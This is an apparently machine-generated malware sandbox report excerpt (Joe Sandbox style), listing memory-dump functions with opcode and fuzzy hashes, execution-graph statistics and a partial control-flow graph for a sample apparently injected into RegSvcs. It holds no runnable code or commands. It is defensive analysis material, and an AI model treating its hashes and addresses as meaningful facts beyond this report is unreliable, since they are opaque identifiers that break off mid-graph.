                          • Instruction Fuzzy Hash: 010175B0925208EFDB08DFA4E54955EFFB6FFCA201F148465D409E3255EB348A418B45
                          Function 053924D0 Relevance: .0, Instructions: 41COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 954d991bd32af9d8dbab54a293c200f21e8457fc7ac1a94f97bf3aa7c8c43e7a
                          • Instruction ID: 723c4c08d194ee7d3e17781b823c15058c4312041318956f1bfd45da82520140
                          • Opcode Fuzzy Hash: 954d991bd32af9d8dbab54a293c200f21e8457fc7ac1a94f97bf3aa7c8c43e7a
                          • Instruction Fuzzy Hash: B7016D38300A00DFCB18EB69D450E27B3EABF85721B55C569E40ACB261DBB1EC02CB50
                          Function 0539BF51 Relevance: .0, Instructions: 41COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 554caa46ca4e3704ef6b8dcf420d6446bc3eb4b09b0881172640b8fb8ed4e310
                          • Instruction ID: 555fd1b2d5c5d0ed25e1af39b1f4fb5ad1abb36b4f4be355b6b693dfb8fe0662
                          • Opcode Fuzzy Hash: 554caa46ca4e3704ef6b8dcf420d6446bc3eb4b09b0881172640b8fb8ed4e310
                          • Instruction Fuzzy Hash: 31011675A04288AFDB05DFB8D598A9DBFF1AF49200F09C0E5E448AB362DB349A41DF41
                          Function 0539EFEE Relevance: .0, Instructions: 40COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4d6da3c29b9ff4206bb0772964c33ca46d78971dbf9d98b5bca8fe5c4b73f227
                          • Instruction ID: e5482efcb0956a8c45bf9b1f7d977eeac1d3cd2221583e479b84b86bdfa86611
                          • Opcode Fuzzy Hash: 4d6da3c29b9ff4206bb0772964c33ca46d78971dbf9d98b5bca8fe5c4b73f227
                          • Instruction Fuzzy Hash: 530129B4A14309CFEB15DFA8D184A9DBBFAFB49301B009519E40ADB725CB709D40CF50
                          Function 0539F490 Relevance: .0, Instructions: 38COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: dc1330c5c8bdd8e49f36147c6f8df90ac63e525f622496e55b9c95cddb52055c
                          • Instruction ID: d2cc584ddf5c248f44183f14b2ed30addd506fa6dee6d6e42030251f2c28fe2b
                          • Opcode Fuzzy Hash: dc1330c5c8bdd8e49f36147c6f8df90ac63e525f622496e55b9c95cddb52055c
                          • Instruction Fuzzy Hash: 87113074A1431ACFEB65CF24D8857D9BB7AEB49200F1041D6A50EDBB15DB704E81CF62
                          Function 0539F164 Relevance: .0, Instructions: 37COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8dd0535c1d7c328a656855038857a591c1af8a9f84d5e822d484d611ed008594
                          • Instruction ID: 963701ece49848f2aa415c113391ede89bfa6d9e4b1725a60410b13d49f46edf
                          • Opcode Fuzzy Hash: 8dd0535c1d7c328a656855038857a591c1af8a9f84d5e822d484d611ed008594
                          • Instruction Fuzzy Hash: 35016DB4A04249CFDB09DFA4E985A9DBFBAFB49310F105215E905DB399DB709C01CF90
                          Function 053915B0 Relevance: .0, Instructions: 34COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4dd82659b29cfd43d5112fe6bdcdcf6d1c549dc31aaa77dee61656a15f608a38
                          • Instruction ID: e4ae390324927658b3c046a64fb94a07b10541bb695729efea5442985ff6acd3
                          • Opcode Fuzzy Hash: 4dd82659b29cfd43d5112fe6bdcdcf6d1c549dc31aaa77dee61656a15f608a38
                          • Instruction Fuzzy Hash: BDF08273E1062ABBDF20ED94CC457EA37A4EB05325F188A21FDA5E2241D3B5D560CB91
                          Function 0539BF60 Relevance: .0, Instructions: 34COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4108451e29f9a0ef0377ae776e6cad31bcf7e150a33562fa94a7a34c7cf54d5c
                          • Instruction ID: 14449293867d5954ae22d12042d886332d3edb95cc9506020ee64ee74949032c
                          • Opcode Fuzzy Hash: 4108451e29f9a0ef0377ae776e6cad31bcf7e150a33562fa94a7a34c7cf54d5c
                          • Instruction Fuzzy Hash: F401B275A00208AFDB04DFA9D589A9DBFF5BF48300F05C0A8E808AB365DB34AA40DF41
                          Function 05394D20 Relevance: .0, Instructions: 32COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cc3d451f132f853ac50fdf49aaced998cdf77e793e8d83839542de1f1cadfda6
                          • Instruction ID: a0bacdf8c75ddb174d5e6b3370689e2ab0ec1ba3ba6c80cd27d138f460c1cbb1
                          • Opcode Fuzzy Hash: cc3d451f132f853ac50fdf49aaced998cdf77e793e8d83839542de1f1cadfda6
                          • Instruction Fuzzy Hash: DBF019B4A04248DFCB45FBB8E55959CBFB1BF44201B1045A9E40AF7291EF705E049B55
                          Function 05394F0A Relevance: .0, Instructions: 31COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6840bc8eeaad4dc76397a863fc8961fbf053dab3a8ac6aef6bcee8231c408d50
                          • Instruction ID: d04197af7bee7b4fc45e50bf3fbe2c2640f79847ffe515fb2a0c54c2c697a07f
                          • Opcode Fuzzy Hash: 6840bc8eeaad4dc76397a863fc8961fbf053dab3a8ac6aef6bcee8231c408d50
                          • Instruction Fuzzy Hash: 9CF08C362112069FDB04EB78D480DAA3BAAFF863543144469F109DB224DFB1DC02CBA0
                          Function 0539EF70 Relevance: .0, Instructions: 31COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: afdaf39f765f607308c99a19739e72e2f14cbaeed5a3c69b792c8697135043c4
                          • Instruction ID: 869a9baea27c451f185f59ea3f900ef1acae3db73b77d512565649767ff27860
                          • Opcode Fuzzy Hash: afdaf39f765f607308c99a19739e72e2f14cbaeed5a3c69b792c8697135043c4
                          • Instruction Fuzzy Hash: 37F0E2B48082488FFB1ADB78C5407E83FBEAB46300F509526C206D7696DB741840CB12
                          Function 0539478D Relevance: .0, Instructions: 30COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 230828fcbdbaa2462e94dd225a4b7d0a219631d0ca7c90c9a87c6c9724e9142c
                          • Instruction ID: 322ed5cb03bd929fec3c97d6f6deefa68c7e1ce299974406f26cc6c75ff7f76e
                          • Opcode Fuzzy Hash: 230828fcbdbaa2462e94dd225a4b7d0a219631d0ca7c90c9a87c6c9724e9142c
                          • Instruction Fuzzy Hash: B5F030B9614109CFDF18DBA8E4897E833F5FB46356F410065D01AE7290D7748986CF51
                          Function 05394F10 Relevance: .0, Instructions: 29COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c95a3e4cde43d7fa84fa094760b242b19a8113960a088c3df5c9e18f0d9c09cf
                          • Instruction ID: d41b8f3a13b92bcfe42640f8b9bf0a820f1ac3713d4a6bd58ee0cf38773c944a
                          • Opcode Fuzzy Hash: c95a3e4cde43d7fa84fa094760b242b19a8113960a088c3df5c9e18f0d9c09cf
                          • Instruction Fuzzy Hash: A9F030363112069FDB05AF79D480DAA3BAAFFC63543144465F505CB224DF71DC01DB94
                          Function 0539EF80 Relevance: .0, Instructions: 27COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 794b1ab9215b867a8782a69e583b2aa84cebd9559bdb3a076530625fcfe4f6bb
                          • Instruction ID: dab8c4308121b32ff63ac1943b06fd208a4705baa5c95a9e11d560332b4cf7da
                          • Opcode Fuzzy Hash: 794b1ab9215b867a8782a69e583b2aa84cebd9559bdb3a076530625fcfe4f6bb
                          • Instruction Fuzzy Hash: 44F02BB090824DCBFF19DB79C4447F97BFEAB8A340F509125D10696295DF701840CB52
                          Function 05391E39 Relevance: .0, Instructions: 27COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ac4cfdf4513a8c709a4a59cb890b465a99a33c2137e53b41d5926757d4c619b5
                          • Instruction ID: bec6a6c60ac9fd12960a213241e42300b9beca22cae7ed44308228bc7974dab6
                          • Opcode Fuzzy Hash: ac4cfdf4513a8c709a4a59cb890b465a99a33c2137e53b41d5926757d4c619b5
                          • Instruction Fuzzy Hash: C7F0EC713006108FE7256F34E42D34B7BA2AF44315F004A2DD09A8BBC2DB7A99068B84
                          Function 05391E48 Relevance: .0, Instructions: 25COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: dc67af0016a56598b6f7264d57ca7737138cd663eeaf1ef95e37555dc0d77a83
                          • Instruction ID: 314a016d6bc4aacd9b0aded96d9a609beb3d088447b341712d6ec4a016bc06a7
                          • Opcode Fuzzy Hash: dc67af0016a56598b6f7264d57ca7737138cd663eeaf1ef95e37555dc0d77a83
                          • Instruction Fuzzy Hash: CCE06D303107108FD7257F78F41864B7BEAAF85325F104A2DE05A8B6D1DF76A8058BD5
                          Function 0539A40B Relevance: .0, Instructions: 24COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 28e2883075a0b5b28bdd7db57a3d33e037c38aae0cfff548e31f13c6277cb1a3
                          • Instruction ID: 2705d2001d58a6dab33c8f901d198110488c9925102df9ba49ced7a94aa26e70
                          • Opcode Fuzzy Hash: 28e2883075a0b5b28bdd7db57a3d33e037c38aae0cfff548e31f13c6277cb1a3
                          • Instruction Fuzzy Hash: FFF01CB0D00208DFCB05DFA8D949AADBFB4FF09300F5046A9E814A3341D7709A10DF85
                          Function 05394EBA Relevance: .0, Instructions: 24COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c4e06a5cce0c18f7252d4e47e8c26c76c0dfe4c33b20e631d3b903ecae985b06
                          • Instruction ID: ae43b5fad6d758ed3a7cccc167d8a7e7866d71ee991b9de69e24c0cd7c5cda4d
                          • Opcode Fuzzy Hash: c4e06a5cce0c18f7252d4e47e8c26c76c0dfe4c33b20e631d3b903ecae985b06
                          • Instruction Fuzzy Hash: 1CE0C976D0420CEBCB40DFE4D949ADDBFB4EF44200F1082A9991AA3240EA715B058B81
                          Function 0539B06A Relevance: .0, Instructions: 24COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b25e3ad82787ff0988fa8fdcbd920e39f6f677b2e44b68dfab892c77c56634ea
                          • Instruction ID: 0ce95245f9f4d3a6d409fc40bfc96247ecbab696a7ec9c6c73f968c341f1672f
                          • Opcode Fuzzy Hash: b25e3ad82787ff0988fa8fdcbd920e39f6f677b2e44b68dfab892c77c56634ea
                          • Instruction Fuzzy Hash: 4EF09D74902798CFCB65CF64D898AD8BBB5AF49302F61119AE449AB350DB30AE81CF40
                          Function 0539A410 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0c3bad736da2c51d57c40d9aa7da4476f9d8caea91acb30856069691b393eab5
                          • Instruction ID: e30f43946eb49b9a5515af4f0a635b70f2656426a1ff30a22624240329bf9333
                          • Opcode Fuzzy Hash: 0c3bad736da2c51d57c40d9aa7da4476f9d8caea91acb30856069691b393eab5
                          • Instruction Fuzzy Hash: 59F015B0D00208DFCB04DFA8D509AAEBBB4FF09300F1086AAE814A3340D7709A10DF81
                          Function 05398E22 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 28341b7338a9faa5ecec98132502137d396ac4225c384e644912572210a6fcb7
                          • Instruction ID: 2ed100637dbc57e5924e773a89033470b64681305676c5694256616dc80bbf01
                          • Opcode Fuzzy Hash: 28341b7338a9faa5ecec98132502137d396ac4225c384e644912572210a6fcb7
                          • Instruction Fuzzy Hash: 7FF074B0E056198BDB58DFEAD94139EFBF2BB88300F10D4AAD118B7258E6305A859F51
                          Function 0539F3E6 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0668cbfd5e678a01c5dbdf20c22dc9e0d86a43d6506c242f5a2c3e2f280f13b3
                          • Instruction ID: 18acf50f60d9d6c0fb6c6d821770584ca6f8f143179f80bf42403f641e3c6f53
                          • Opcode Fuzzy Hash: 0668cbfd5e678a01c5dbdf20c22dc9e0d86a43d6506c242f5a2c3e2f280f13b3
                          • Instruction Fuzzy Hash: 1CF01CB8A1420A8FEB25DF68D4850EDBFBAEB89304F10A12AE5069BB05DA704C018F11
                          Function 05391DF0 Relevance: .0, Instructions: 21COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 51de11489f5c4627c0c0888c2e2af5fd9690a8bbd122df9bef03b6e155298250
                          • Instruction ID: 65634b266bccce248384671b0375da839bccd5755397bba62f19957d2e5900c9
                          • Opcode Fuzzy Hash: 51de11489f5c4627c0c0888c2e2af5fd9690a8bbd122df9bef03b6e155298250
                          • Instruction Fuzzy Hash: 60E0DF312042528FCA209234E894BAB77B1AF81210F04446AE291CB141CEB45C00C790
                          Function 05395C68 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e478e81ab926c6649e52315bbc79d3e9583e393178134634a88cda7459f9e98d
                          • Instruction ID: f5aaa8c053df97211fc445b21efce88bf3d4dd15a902dbc6f408fc5a23371213
                          • Opcode Fuzzy Hash: e478e81ab926c6649e52315bbc79d3e9583e393178134634a88cda7459f9e98d
                          • Instruction Fuzzy Hash: 04E08675755410CFDB19DB74E458BE83BA2FF89716F0948ADE04A87366CE645802CB84
                          Function 05394751 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bfd04a5f026bcb9e04efa8c79725090a90d241f2cfd8de843315615af8d2b965
                          • Instruction ID: 955cb1224d4f70d34d171e1f24db474d38521baf8190eed0c808ee0707572a16
                          • Opcode Fuzzy Hash: bfd04a5f026bcb9e04efa8c79725090a90d241f2cfd8de843315615af8d2b965
                          • Instruction Fuzzy Hash: C3E01A396100188FCF44DAA8E4897EC77B4BB45256F4100A4E01AEB2A1DB349946CF50
                          Function 05395C78 Relevance: .0, Instructions: 18COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f741ce01801449999d68e430263473e23455d3753224acf1fd53a616b3e0d63e
                          • Instruction ID: d4f02e93db6234de97c9677a400b841d373a1cd77fb5c7fa6476481e0a4fa7df
                          • Opcode Fuzzy Hash: f741ce01801449999d68e430263473e23455d3753224acf1fd53a616b3e0d63e
                          • Instruction Fuzzy Hash: 92D017707545248BDA1CAB79D458BA937DAAB88625F0540AAE40A87362CFA0AC428BC4
                          Function 05399440 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4169b4a380ae52c82bd043fba7c888ce2caa9faf15b9223caa777a4c6c804a13
                          • Instruction ID: 450826f0e52d0c5ed13a1aab06ea96e319c31c1e577b09b93ee22b873d42f5ed
                          • Opcode Fuzzy Hash: 4169b4a380ae52c82bd043fba7c888ce2caa9faf15b9223caa777a4c6c804a13
                          • Instruction Fuzzy Hash: 5FE01A70D0111ACBEB98DF29CD80B8CFBB6AF88200F0096A5D00DA7260DA305D848F14
                          Function 0539B0FB Relevance: .0, Instructions: 10COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 23a245f0dcab52cf0175790696f7671b53ba43a20786ecebb60829b56ffef8af
                          • Instruction ID: b1a90b9dd7d6a9d2643b79753101883e486a0cf9c2c02e8aee57035b0ea91a33
                          • Opcode Fuzzy Hash: 23a245f0dcab52cf0175790696f7671b53ba43a20786ecebb60829b56ffef8af
                          • Instruction Fuzzy Hash: 52D0A9B2602349CFCF48CBA0C18098CBFB2FF49311F2040A8900A8F214CB35DE80CB00
                          Function 053940C2 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e9efc7bb98b5864ba8bce3e0258b29dfd0e07fc8570131907d8a47b6822d3263
                          • Instruction ID: 1d6f1e51221888350e28b19dab5c60b7ec8714132b4bc5b8d2c9781b99250054
                          • Opcode Fuzzy Hash: e9efc7bb98b5864ba8bce3e0258b29dfd0e07fc8570131907d8a47b6822d3263
                          • Instruction Fuzzy Hash: 02B01223450860CBDF00C370C9CB3043A20DF41311F8F8690401181341CE068422C104

                          Execution Graph

                          Execution Coverage:12.4%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:17
                          Total number of Limit Nodes:4
                          execution_graph 27443 3000848 27445 300084a 27443->27445 27444 300091b 27445->27444 27447 300138f 27445->27447 27449 3001393 27447->27449 27448 30014a4 27448->27445 27449->27448 27451 3007fa0 27449->27451 27452 3007faa 27451->27452 27453 3007fc4 27452->27453 27456 6b0faa0 27452->27456 27460 6b0fa8f 27452->27460 27453->27449 27458 6b0fab5 27456->27458 27457 6b0fcca 27457->27453 27458->27457 27459 6b0fce0 GlobalMemoryStatusEx GlobalMemoryStatusEx 27458->27459 27459->27458 27462 6b0fab5 27460->27462 27461 6b0fcca 27461->27453 27462->27461 27463 6b0fce0 GlobalMemoryStatusEx GlobalMemoryStatusEx 27462->27463 27463->27462

                          Executed Functions

                          Function 06B02428 Relevance: 1.5, Instructions: 1478COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e622799a0451c8c5f82912f8e4ed36836152bf48397e19e4892b2ed7c141eba8
                          • Instruction ID: 0bb88f21cd35be533a29cffe358723f2a2fc43d5193a6f290419ffeb92112bea
                          • Opcode Fuzzy Hash: e622799a0451c8c5f82912f8e4ed36836152bf48397e19e4892b2ed7c141eba8
                          • Instruction Fuzzy Hash: 35D25B74E00205CFEB64DB68C598A9DBBF2FF89310F54C5A9D409AB291DB34ED85CB90
                          Function 06B06658 Relevance: .8, Instructions: 828COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 781a5506d3adacdcc6de96ba10812d36be6d571b0b5489ae0535d9f17396b803
                          • Instruction ID: 314ee4675d3aa72b3d9eb1cfce096745f5fabb4ce575d4347900e6548ae8e72d
                          • Opcode Fuzzy Hash: 781a5506d3adacdcc6de96ba10812d36be6d571b0b5489ae0535d9f17396b803
                          • Instruction Fuzzy Hash: D3629F75F002048FEB54DB68D594AADBFF2EF88314F1485A9E406AB391EB35EC51CB90
                          Function 06B0B2A0 Relevance: .8, Instructions: 764COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9b95d81d79ca95626a9cfb045bfd60608859f0250d506c81ca9a53d55aff8b7c
                          • Instruction ID: f2c61c52e53aaabc7500af8e2ae3639aa08788e074252a0a18726413811fa340
                          • Opcode Fuzzy Hash: 9b95d81d79ca95626a9cfb045bfd60608859f0250d506c81ca9a53d55aff8b7c
                          • Instruction Fuzzy Hash: F15270B0E002098FEF64DB68D5907ADBFB2FB49310F2495AAE405EB391DA36DD41CB51
                          Function 06B0C1F0 Relevance: .6, Instructions: 642COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1916 6b0c1f0-6b0c210 1917 6b0c212-6b0c215 1916->1917 1918 6b0c235-6b0c238 1917->1918 1919 6b0c217-6b0c230 1917->1919 1920 6b0c264-6b0c267 1918->1920 1921 6b0c23a-6b0c25f 1918->1921 1919->1918 1922 6b0c293-6b0c296 1920->1922 1923 6b0c269-6b0c28e 1920->1923 1921->1920 1926 6b0c298-6b0c29b 1922->1926 1927 6b0c309-6b0c312 1922->1927 1923->1922 1928 6b0c2b3-6b0c2b6 1926->1928 1929 6b0c29d-6b0c2ae 1926->1929 1930 6b0c318 1927->1930 1931 6b0c41b-6b0c424 1927->1931 1935 6b0c2e1-6b0c2e4 1928->1935 1936 6b0c2b8-6b0c2dc 1928->1936 1929->1928 1933 6b0c31d-6b0c320 1930->1933 1937 6b0c583-6b0c598 1931->1937 1938 6b0c42a-6b0c431 1931->1938 1940 6b0c322-6b0c346 1933->1940 1941 6b0c34b-6b0c34e 1933->1941 1943 6b0c304-6b0c307 1935->1943 1944 6b0c2e6-6b0c2ff 1935->1944 1936->1935 1953 6b0c59a-6b0c5bd 1937->1953 1954 6b0c52c-6b0c53f 1937->1954 1945 6b0c436-6b0c439 1938->1945 1940->1941 1948 6b0c350-6b0c356 1941->1948 1949 6b0c35b-6b0c35e 1941->1949 1943->1927 1943->1933 1944->1943 1950 6b0c443-6b0c446 1945->1950 1951 6b0c43b-6b0c43e 1945->1951 1948->1949 1956 6b0c3c0-6b0c3c3 1949->1956 1957 6b0c360-6b0c3bb 1949->1957 1960 6b0c450-6b0c453 1950->1960 1961 6b0c448-6b0c44d 1950->1961 1951->1950 1965 6b0c5bf-6b0c5c2 